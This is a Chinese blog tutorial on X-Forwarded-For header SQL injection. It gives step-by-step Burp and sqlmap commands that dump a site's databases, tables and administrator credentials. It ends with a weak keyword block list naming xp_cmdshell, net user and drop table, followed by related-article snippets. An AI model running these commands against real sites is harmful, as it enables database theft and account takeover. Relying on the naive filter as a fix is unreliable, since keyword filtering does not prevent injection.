网络安全之web攻防 sql注入 XFF注入获取网站管理员账号密码

最新推荐文章于 2024-06-05 08:37:40 发布
最新推荐文章于 2024-06-05 08:37:40 发布
阅读量1.3k 收藏 8
点赞数 1
分类专栏: 灰色是最美的颜色 文章标签: X-Forwarded-for注入 SQL注入 web网络安全攻防 sqlmap注入 sql注入修复方案
辛苦原创,请勿盗取。
本文链接:https://blog.csdn.net/shuryuu/article/details/102724106
版权

XFF,是X-Forwarded-for的缩写,XFF注入是SQL注入的一种,该注入原理是通过修改X-Forwarded-for头对带入系统的dns进行sql注入,从而得到网站的数据库内容。

漏洞前提:HTTP Header中存在X-Forwarded-for参数的调用。

检测方法:通过火狐的插件X-Forwarded-for header 1.0.1.1进行对本地IP地址进行修改,为其带入的IP地址加入敏感字符。

判断方法:修改后,找到网站登录页面或者其它功能交互页面,提交数据后,查看是否会报错,如果会报错,则说明存在该漏洞

例子:

1.随意账号密码登陆,burp抓取数据包

2.再右键发送到repeater中添加参数:X—forwarded-for: * 保存.txt文件到sqlmap根目录下

3.对添加参数的POST包进行sql注入,利用sqlmap工具

4.命令python sqlmap.py -r 包保存的绝对路径

5.获取当前的数据库,命令:python sqlmap.py -r 文件路径 --current-db

6.查看所有数据库,防止用户名密码不在此数据库中(python sqlmap.py -r 文件路径 --database)

查看数据库中的表(python sqlmap.py -r 文件路径 -D 数据库名 --tables)

7.查看表中的字段(python sqlmap.py -r 文件路径 -D 数据库名 -T表名 --columns)

8.查看下级字段中的内容(python sqlmap.py -r 文件路径 -D 数据库名 -T 表名 -C"字段名") --dump

9.得到账号密码

 

修复方案:

1、过滤http头中的X-Forwarded-for header中的内容,不允许其插入敏感字符,过滤字符参考sql注入修复方案。

2、过滤以下敏感字符。需要过滤的特殊字符及字符串有:

net user
xp_cmdshell
add
exec master.dbo.xp_cmdshell
net localgroup administrators
select
count
Asc
char
mid
'
:
"
insert
delete from
drop table
update
truncate
from
%

 

白夜鬼魅
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web渗透攻击实战(2)—获取网站后台登录用户名密码
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
09-11 9140
接上一篇内容: 渗透攻击实战(1)—成功渗透台湾某净化设备公司官网 写在前面 作为一个防御型白帽黑客​ 你一定要知道黑客的进攻套路 才能有相应的防御措施 声明:只做测试,发现对方的漏洞,并不进行破坏性操作 信息汇总 漏洞汇总: 1、存在SQL注入漏洞2、SQL注入查询长度为9个字段,即 union select 1,2,3,4,5,6,7,8,93、网站无错误回显,SQL执行错误显示空白页面 数据库信息: 1、数据库版本:mysql 5...
XFF注入原理分析
m0_46304840的博客
03-11 4543
目录 前言: 正文 0x01:xff头源码以及形成 0x02 xff注入方式 第一种 union注入 1)爆出库名 第二种 报错注入(updatexml & exctractvalue) 前言: 关于SQL注入还有好多种,前面写的都是基于mysql环境下,接下来会更新其他数据库该如何注入 但是前面的得认真观看,以及源码...
XFF注入【墨者靶场】
最新发布
qq_68163788的博客
06-05 590
X-Forwarded-For是一个HTTP请求头部信息,用于标识HTTP请求经过的代理服务器IP地址。通常情况下,当一个客户端向服务器发送请求时,服务器会将请求来源的IP地址记录在日志中,以便进行信息追踪和安全检测。 然而,当请求经过多个代理服务器时,服务器可能无法准确判断请求的真实发起者IP地址。这时就需要使用X-Forwarded-For头部信息来记录请求经过的代理服务器IP地址。
浅谈“XFF注入
→_→
05-11 5889
漏洞名称: XFF注入、X-Forwarded-for注入 描述: XFF,是X-Forwarded-for的缩写,XFF注入SQL注入的一种,该注入原理是通过修改X-Forwarded-for头对带入系统的dns进行sql注入,从而得到网站的数据库内容。 检测条件: 1.Web业务运行正常 2.HTTP Header中存在X-Forwarded-for参数的调用 检测方法: 假设XFF注入PHP代码如下: 确定漏洞的存在 使用burpsuite工具进行抓包,并用Re
网络安全web攻防 sql注入 mysql手工注入获取网站管理员账号密码
网络安全领域优质创作者
10-24 2245
该文章讲解mysql注入的思路。没有对关键字进行过滤的情况。 1.判断是否存在注入,and 1=1 没报错 1=2 错误 说明有注入点 http://xxxx.com/new_list.php?id=1 and 1=1 http://xxxx.com/new_list.php?id=1 and 1=2 2.获取字段列,判断几列 order by 4 没报错 说明有4列 htt...
X-Forwarded-For注入漏洞实战
Language_Sumuzhe的博客
05-23 7614
题目:X-Forwarded-For注入漏洞实战 知识点: 是HTTP请求头中XFF的伪造和应用,是一道借用XFF来爆破数据库、表、列以及列值的题目。先输入账户为admin,密码为123456进行登录尝试,出现了弹窗,仔细观察弹窗会发现类似IP地址格式的112.111.12.126数据存在,猜测这是服务端记录并显示了客户端的IP地址。 首先了解服务端如何获取客户端请求IP地址? 服务端获取客户端请求IP地址,常见的包括:x-forwarded-for、client-ip等请求头,以及remote_add
注入安卓进程,并hook java世界的方法
08-30
在Android平台上,注入和Hook技术是安全研究和逆向工程中的关键技能,它们允许开发者或者安全研究人员深入到应用程序的内部工作原理,监控或修改特定的行为。"注入安卓进程,并hook java世界的方法"这一主题主要涵盖...
微信开发之使用java获取签名signature
09-01
在微信开发中,Java获取签名(signature)是一个关键步骤,因为它是确保微信接口安全调用的重要组成部分。微信的API调用通常需要四个参数:noncestr(随机字符串)、timestamp(时间戳)、signature(签名)以及...
Android获取网络时间
10-29
在Android应用开发中,获取网络时间是一项常见的需求,主要用于确保应用程序中的时间信息准确无误,避免用户手动修改设备时间导致的潜在问题。本教程将详细讲解如何在Android中实现网络时间的获取,并提供相关的代码...
Java Web开发之MD5加密用法分析
09-03
在Java Web开发中,MD5常用于对敏感信息,如用户密码,进行不可逆的加密处理,以保护数据的安全性。 MD5的主要特点包括: 1. **单向性**:一旦数据经过MD5加密,无法通过加密结果反推原始信息。 2. **固定长度**:...
Modem无网络问题LTE模块软件分析_之一.docx
08-20
在IT行业中,尤其是在移动通信领域,高通Modem以其高性能和广泛的网络支持而备受推崇,特别是在LTE网络方面。本文主要针对“Modem无网络问题LTE模块软件分析”进行深入探讨,着重于问题排查、原因分析以及对策制定。...
植物大战僵尸注入汇编写法-易语言
06-12
先说说注入的不注入的自我感觉,我感觉不是注入的CALL的太多很容易导致程序奔溃。而注入的稳定的多。当然也可能是我的错觉 首先我用了易语言 自带的 置入代码 部分写法如下: 那么我们CALL的原型就是: push 0xFF ...
Android数据加密之SHA安全散列算法
09-01
SHA(Secure Hash Algorithm,安全散列算法)是用于数据安全的一种加密技术,广泛应用于数字签名、数据完整性验证等领域。在Android开发中,SHA家族的成员,如SHA-1、SHA-224、SHA-256、SHA-384和SHA-512,常用于对...
与上0xFF的意义.zip
06-05
例如,如果你有一个32位的整数,其中低8位代表颜色,你可以用0xFF与之进行按位与,以获取颜色信息。 3. **检查位状态**:如果想知道某个特定位是否为1,可以将该数与具有该位设置为1的位掩码进行按位与。如果结果非...
VC++ 获取网络配置及网卡MAC和IP地址
03-17
在VC++编程环境中,获取网络配置以及网卡的MAC和IP地址是常见的需求,这涉及到对Windows系统API的深入理解和应用。以下将详细介绍如何通过VC++实现这些功能。 首先,要获取网络配置,我们需要调用Windows API中的...
linux 下将指定文件以0xFF填充到指定大小源码
01-15
linux 下将指定文件在结尾添加0xFF添加到指定大小(源码)。用法gcc 编译后运行,有帮助命令。4G以上文件未测试。(A:代码风格糟糕注释少,还是没人用的生僻工具,骗分!B:啥~骗分?技术上的事情不叫骗。)
渗透测试-XFF漏洞攻击原理及防御方案
lza20001103的博客
04-15 2348
渗透测试-XFF漏洞攻击原理及防御方案
XFF漏洞利用说明
墨痕诉清风的博客
10-09 2206
X-Forwarded-For(XFF) XFF是header请求头中的一个参数 是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 代表了HTTP的请求端真实的IP。 X-Forwarded-For: client1, proxy1, proxy2, proxy3 //浏览器IP,第一个代理服务器,第二个三个四个等等 利用方式 1.绕过服务器过滤 XFF漏洞也称为IP欺骗。 有些服务器通过XFF头判断是否是本地服务器,当判断为本地服务器时,
[网络安全自学篇] 二十七.Sqlmap基础用法、CTF实战及请求参数设置(一)
Azreal的博客
07-09 1604
一.Sqlmap介绍 Sqlmap 是一个开源的渗透测试工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,通过外部连接访问数据库底层文件系统和操作系统,并执行命令实现渗透。许多适合于终极渗透测试的小众特性和广泛的开发,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。 Sqlmap下载 可以从官方网址、Github或Python调用PIP命令实现。 官方网址:http://sqlmap.org.
网络安全面经收集频率最高的100道题
04-09
网络安全面经收集频率最高的100道题主要包括SQL注入、XSS、CSRF、命令注入、文件包含等方面的内容。其中,SQL注入是一个常见的漏洞,攻击者通过在输入中插入SQL语句,从而对数据库进行恶意操作。SQL注入分为字符型、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值